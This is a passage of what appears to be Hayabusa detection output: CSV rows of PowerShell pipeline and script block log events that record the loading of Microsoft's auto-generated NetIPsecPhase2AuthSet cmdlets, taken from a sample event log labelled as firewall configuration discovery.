$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 